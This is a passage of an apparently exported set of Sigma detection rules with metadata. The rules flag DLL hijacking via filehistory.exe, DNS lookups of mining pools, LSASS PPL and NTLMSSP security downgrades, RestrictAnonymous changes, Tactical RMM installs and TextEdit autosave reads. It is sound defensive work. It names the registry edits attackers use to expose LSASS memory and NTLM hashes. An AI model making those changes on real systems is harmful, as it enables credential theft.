"content": "title: DLL Hijacking via filehistory.exe\nid: ebb95111-6046-42fa-a44e-b9fedef79771\ndescription: |\n Detects potential Windows DLL Hijacking via filehistory.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'filehistory.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\dsrole.dll'\n - '\\efsutil.dll'\n - '\\explorerframe.dll'\n - '\\fhcfg.dll'\n - '\\mpr.dll'\n - '\\msctf.dll'\n - '\\ncrypt.dll'\n - '\\rsaenh.dll'\n - '\\UxTheme.dll'\n - '\\wevtapi.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n 
filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ebb95111-6046-42fa-a44e-b9fedef79771",
"rule_name": "DLL Hijacking via filehistory.exe",
"rule_description": "Detects potential Windows DLL Hijacking via filehistory.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ebcc3c72-c1f1-476c-b665-6fd18b618287",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627905Z",
"creation_date": "2026-03-23T11:45:34.627907Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627911Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.malwarebytes.com/cryptojacking",
"https://attack.mitre.org/techniques/T1496/"
],
"name": "t1496_cryptominer_pool_dns_request_linux.yml",
"content": "title: DNS Request to Cryptocurrency Mining Pool (Linux)\nid: ebcc3c72-c1f1-476c-b665-6fd18b618287\ndescription: |\n Detects a DNS resolution request for a known cryptocurrency mining pool website.\n A mining pool is a joint group of cryptocurrency miners who combine resources over a network to find blocks quicker and share coins.\n This may be an indicator of hidden or covert mining programs in a system making requests to crypto pooling websites.\n It is recommended to investigate the process performing this request to determine its legitimacy.\nreferences:\n - https://www.malwarebytes.com/cryptojacking\n - https://attack.mitre.org/techniques/T1496/\ndate: 2023/12/11\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Linux.Source.DnsQuery\n - classification.Linux.Behavior.CryptoMiner\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n product: linux\n category: dns_query\ndetection:\n selection:\n QueryName|contains:\n - '2miners.com'\n - '6block.com'\n - 'acepool.top'\n - 'aionpool.tech'\n - 'alph-pool.com'\n - 'backend-aplha.com'\n - 'baikalmine.com'\n - 'blocx.zone'\n - 'bluenose.link'\n - 'bohemianpool.com'\n - 'c3pool.com'\n - 'cedric-crispin.com'\n - 'cryptonote.social'\n - 'crypto-pool.fr'\n - 'dxpool.net'\n - 'educu.xyz'\n - 'ekapool.com'\n - 'ethashpool.com'\n - 'ethermine.org'\n - 'ethwmine.com'\n - 'ezil.me'\n - 'f2pool.com'\n - 'fairhash.org'\n - 'fastpool.xyz'\n - 'flockpool.com'\n - 'fluxpools.net'\n - 'gntl.uk'\n - 'grinmint.com'\n - 'hashcity.org'\n - 'hashvault.pro'\n - 'herominers.com'\n - 'hiveon.com'\n - 'hiveon.net'\n - 'minerno.de'\n - 'minexmr.com'\n - 'miningmadness.com'\n - 'miningocean.org'\n - 'monerod.org'\n - 'monerohash.com'\n - 'moneroocean.stream'\n - 'monerop.com'\n - 'multi-pools.com'\n - 'nanopool.org'\n - 'nicehash.com'\n - 'p2pool.io'\n - 'pool2mine.net'\n - 'pool.binance.com'\n - 'poolin.com'\n - 'pool.kryptex.com'\n - 'pool.sero.cash'\n - 
'pool.xmr.pt'\n - 'prohashing.com'\n - 'raptoreum.zone'\n - 'raptorhash.com'\n - 'ravenminer.com'\n - 'rplant.xyz'\n - 'semipool.com'\n - 'skypool.org'\n - 'solopool.org'\n - 'sunpool.top'\n - 'supportxmr.com'\n - 'suprnova.cc'\n - 'unmineable.com'\n - 'uupool.cn'\n - 'volt-mine.com'\n - 'woolypooly.com'\n - 'xmrpool.eu'\n - 'zergpool.com'\n - 'zeropool.io'\n - 'zpool.ca'\n\n filter_resolver:\n ProcessImage:\n - '/usr/sbin/named'\n - '/lib/systemd/systemd-resolved'\n - '/usr/lib/systemd/systemd-resolved'\n - '/usr/sbin/unbound'\n - '/usr/sbin/pdns_recursor'\n - '/usr/sbin/squid'\n - '/usr/sbin/nscd'\n\n filter_browser:\n ProcessImage|endswith:\n - '/firefox'\n - '/chrome'\n - '/google-chrome'\n - '/google-chrome-stable'\n - '/brave'\n - '/msedge'\n - '/librewolf'\n - '/chromium'\n - '/vivaldi'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ebcc3c72-c1f1-476c-b665-6fd18b618287",
"rule_name": "DNS Request to Cryptocurrency Mining Pool (Linux)",
"rule_description": "Detects a DNS resolution request for a known cryptocurrency mining pool website.\nA mining pool is a joint group of cryptocurrency miners who combine resources over a network to find blocks more quickly and share coins.\nThis may be an indicator of hidden or covert mining programs on a system making requests to crypto pooling websites.\nIt is recommended to investigate the process performing this request to determine its legitimacy.\n",
"rule_creation_date": "2023-12-11",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1496"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ebcf7c10-b156-46b3-bc22-9c7999c0259a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621269Z",
"creation_date": "2026-03-23T11:45:34.621271Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621275Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1547/005/",
"https://attack.mitre.org/mitigations/M1025/"
],
"name": "t1547_005_lsass_ppl_security_downgrade.yml",
"content": "title: LSASS PPL Downgraded\nid: ebcf7c10-b156-46b3-bc22-9c7999c0259a\ndescription: |\n Detects the weakening of the LSASS PPL (Protected Process Light) configuration.\n A PPL process is a process that, through its signature, is inherently trusted by the system and therefore (if enabled) confered a higher level of security by Windows.\n Protected Process are ranked by trust level and cannot be opened or tampered with by processes with a lower trust level.\n On Windows, the LSASS (Local Security Authority Subsystem Service), which holds sensitive authentication material in its memory, can be optionally configured to run as PPL to prevent attackers from dumping its memory.\n Attackers may try to weaken this security configuration to allow themselves to fetch sensitive data from LSASS' memory.\n It is recommended to analyze the process responsible for the registry edit to look for malicious content, as well as to look for other alerts following this one indicating a dump of the LSASS process memory.\nreferences:\n - https://attack.mitre.org/techniques/T1547/005/\n - https://attack.mitre.org/mitigations/M1025/\ndate: 2020/09/22\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.005\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_target:\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\RunAsPPL'\n\n selection_write_false:\n EventType: 'SetValue'\n Details: 'DWORD (0x00000000)'\n\n selection_delete_value:\n EventType: 'DeleteValue'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - 
'?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_healthservice:\n ProcessImage: '?:\\Windows\\System32\\SecurityHealthService.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_deviceenroller:\n Image: '?:\\Windows\\System32\\DeviceEnroller.exe'\n\n exclusion_omadmclient:\n Image: '?:\\WINDOWS\\system32\\omadmclient.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: selection_target and (selection_write_false or selection_delete_value) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ebcf7c10-b156-46b3-bc22-9c7999c0259a",
"rule_name": "LSASS PPL Downgraded",
"rule_description": "Detects the weakening of the LSASS PPL (Protected Process Light) configuration.\nA PPL process is a process that, through its signature, is inherently trusted by the system and is therefore (if enabled) conferred a higher level of security by Windows.\nProtected Processes are ranked by trust level and cannot be opened or tampered with by processes with a lower trust level.\nOn Windows, the LSASS (Local Security Authority Subsystem Service), which holds sensitive authentication material in its memory, can be optionally configured to run as PPL to prevent attackers from dumping its memory.\nAttackers may try to weaken this security configuration to allow themselves to fetch sensitive data from LSASS' memory.\nIt is recommended to analyze the process responsible for the registry edit to look for malicious content, as well as to look for other alerts following this one indicating a dump of the LSASS process memory.\n",
"rule_creation_date": "2020-09-22",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ebd472da-418b-4126-873b-e921337be4d2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622259Z",
"creation_date": "2026-03-23T11:45:34.622261Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622265Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
"https://attack.mitre.org/techniques/T1021/001/",
"https://attack.mitre.org/techniques/T1021/002/",
"https://attack.mitre.org/techniques/T1135/"
],
"name": "t1021_001_restrictanonymous_key_in_registry.yml",
"content": "title: Share Enumeration Security Lowered in Registry\nid: ebd472da-418b-4126-873b-e921337be4d2\ndescription: |\n Detects the modification of the Lsa Registry configuration allowing for Null Sessions to enumerate all network shares.\n Attackers can use this technique to allow all machine users to enumerate devices and perform lateralization through RDP.\n It is recommended to investigate the process performing this action to determine its legitimacy and to look for other malicious actions.\nreferences:\n - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity\n - https://attack.mitre.org/techniques/T1021/001/\n - https://attack.mitre.org/techniques/T1021/002/\n - https://attack.mitre.org/techniques/T1135/\ndate: 2022/11/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.discovery\n - attack.t1135\n - attack.defense_evasion\n - attack.t1112\n - attack.t1562\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\RestrictAnonymous'\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n 
ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_device_enroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessParentImage:\n - '?:\\Windows\\system32\\svchost.exe'\n - '?:\\Windows\\System32\\omadmclient.exe'\n\n exclusion_omadmclient:\n ProcessImage: '?:\\WINDOWS\\system32\\omadmclient.exe'\n\n exclusion_trendmicro1:\n ProcessImage:\n - '?:\\Program Files (x86)\\Trend Micro\\Security Agent\\TSC64.exe'\n - '?:\\Program Files (x86)\\Trend Micro\\OfficeScan Client\\TSC64.exe'\n exclusion_trendmicro2:\n ProcessImage: '?:\\WINDOWS\\RegBootClean64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ebd472da-418b-4126-873b-e921337be4d2",
"rule_name": "Share Enumeration Security Lowered in Registry",
"rule_description": "Detects the modification of the Lsa Registry configuration allowing for Null Sessions to enumerate all network shares.\nAttackers can use this technique to allow all machine users to enumerate devices and perform lateralization through RDP.\nIt is recommended to investigate the process performing this action to determine its legitimacy and to look for other malicious actions.\n",
"rule_creation_date": "2022-11-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.discovery",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1071",
"attack.t1112",
"attack.t1135",
"attack.t1562"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ebe370ee-bbfc-40ed-b1f3-67d8f45c006a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621128Z",
"creation_date": "2026-03-23T11:45:34.621130Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621135Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/troubleshoot/windows-client/windows-security/enable-ntlm-2-authentication",
"https://threathunterplaybook.com/hunts/windows/191224-RegModExtendedNetNTLMDowngrade/notebook.html",
"https://attack.mitre.org/techniques/T1562/001/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1562_001_ntlmssp_security_downgrade.yml",
"content": "title: NTLMSSP Security Downgraded\nid: ebe370ee-bbfc-40ed-b1f3-67d8f45c006a\ndescription: |\n Detects the downgrade of the NTLMSSP configuration in the Windows registry.\n The modification of NtlmMinClientSec registry value to 0 disables all security mechanism for NTLM.\n This weakens the security of network authentications and can be used by attackers to extract the NTLM hash.\n It is recommended to analyze the process responsible for this registry edit as well as for malicious actions in this user session.\nreferences:\n - https://learn.microsoft.com/en-us/troubleshoot/windows-client/windows-security/enable-ntlm-2-authentication\n - https://threathunterplaybook.com/hunts/windows/191224-RegModExtendedNetNTLMDowngrade/notebook.html\n - https://attack.mitre.org/techniques/T1562/001/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2025/06/20\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0\\NtlmMinClientSec'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0\\NtlmMinServerSec'\n Details: 'DWORD (0x00000000)'\n ProcessParentImage|contains: '?'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - 
'?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n\n exclusion_sccm:\n ProcessAncestors|contains:\n - '?:\\MININT\\Tools\\X64\\TsManager.exe'\n - '?:\\MININT\\Tools\\X64\\TsmBootstrap.exe'\n\n exclusion_omadmclient:\n ProcessImage: '?:\\Windows\\System32\\omadmclient.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ebe370ee-bbfc-40ed-b1f3-67d8f45c006a",
"rule_name": "NTLMSSP Security Downgraded",
"rule_description": "Detects the downgrade of the NTLMSSP configuration in the Windows registry.\nThe modification of the NtlmMinClientSec registry value to 0 disables all security mechanisms for NTLM.\nThis weakens the security of network authentications and can be used by attackers to extract the NTLM hash.\nIt is recommended to analyze the process responsible for this registry edit and to look for malicious actions in this user session.\n",
"rule_creation_date": "2025-06-20",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ebf78829-39f1-4f5b-8c36-373e3dcca110",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082833Z",
"creation_date": "2026-03-23T11:45:34.082836Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082840Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_tacticalrmm_agent_installed.yml",
"content": "title: Tactical RMM Agent Installed\nid: ebf78829-39f1-4f5b-8c36-373e3dcca110\ndescription: |\n Detects the installation of Tactical RMM agent.\n Tactical RMM is a remote desktop software that allows users to access and control computers remotely.\n This tool is frequently used by ransomware groups to gain remote access on system.\n It is recommended to verify if the usage of this tool is legitimate and to verify the legitimacy of the control domain (the API URL used on command-line during installation) to ensure the agent is communicating with an authorized Tactical RMM server.\nreferences:\n - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2025/08/06\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.AnyDesk\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains|all:\n - ' -m install --api '\n - ' --client-id '\n - ' --auth '\n\n condition: selection\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ebf78829-39f1-4f5b-8c36-373e3dcca110",
"rule_name": "Tactical RMM Agent Installed",
"rule_description": "Detects the installation of the Tactical RMM agent.\nTactical RMM is remote desktop software that allows users to access and control computers remotely.\nThis tool is frequently used by ransomware groups to gain remote access to systems.\nIt is recommended to verify that the usage of this tool is legitimate and to verify the legitimacy of the control domain (the API URL passed on the command line during installation) to ensure the agent is communicating with an authorized Tactical RMM server.\n",
"rule_creation_date": "2025-08-06",
"rule_modified_date": "2025-11-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ec2971ff-f461-448f-b31a-78f6ddee6cca",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099158Z",
"creation_date": "2026-03-23T11:45:34.099167Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099171Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1005/"
],
"name": "t1005_read_textedit_autosave.yml",
"content": "title: Suspicious Read Access to TextEdit Autosave Files\nid: ec2971ff-f461-448f-b31a-78f6ddee6cca\ndescription: |\n Detects a process reading TextEdit autosave files.\n Adversaries may target autosaved files on local systems to collect sensitive information.\n It is recommended to check whether the process that accessed the file had legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1005/\ndate: 2024/07/03\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Collection\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n Path|startswith: '/Users/*/Library/Containers/com.apple.TextEdit/Data/Library/Autosave Information/'\n ProcessImage|contains: '?'\n\n filter_textedit:\n Image: '/System/Applications/TextEdit.app/Contents/MacOS/TextEdit'\n\n filter_spotlight:\n Image: '/System/Library/Frameworks/CoreSpotlight.framework/spotlightknowledged'\n\n exclusion_QuickLookThumbnailing:\n Image: '/System/Library/Frameworks/QuickLookThumbnailing.framework/Versions/A/PlugIns/ThumbnailExtension_macOS.appex/Contents/MacOS/ThumbnailExtension_macOS'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - 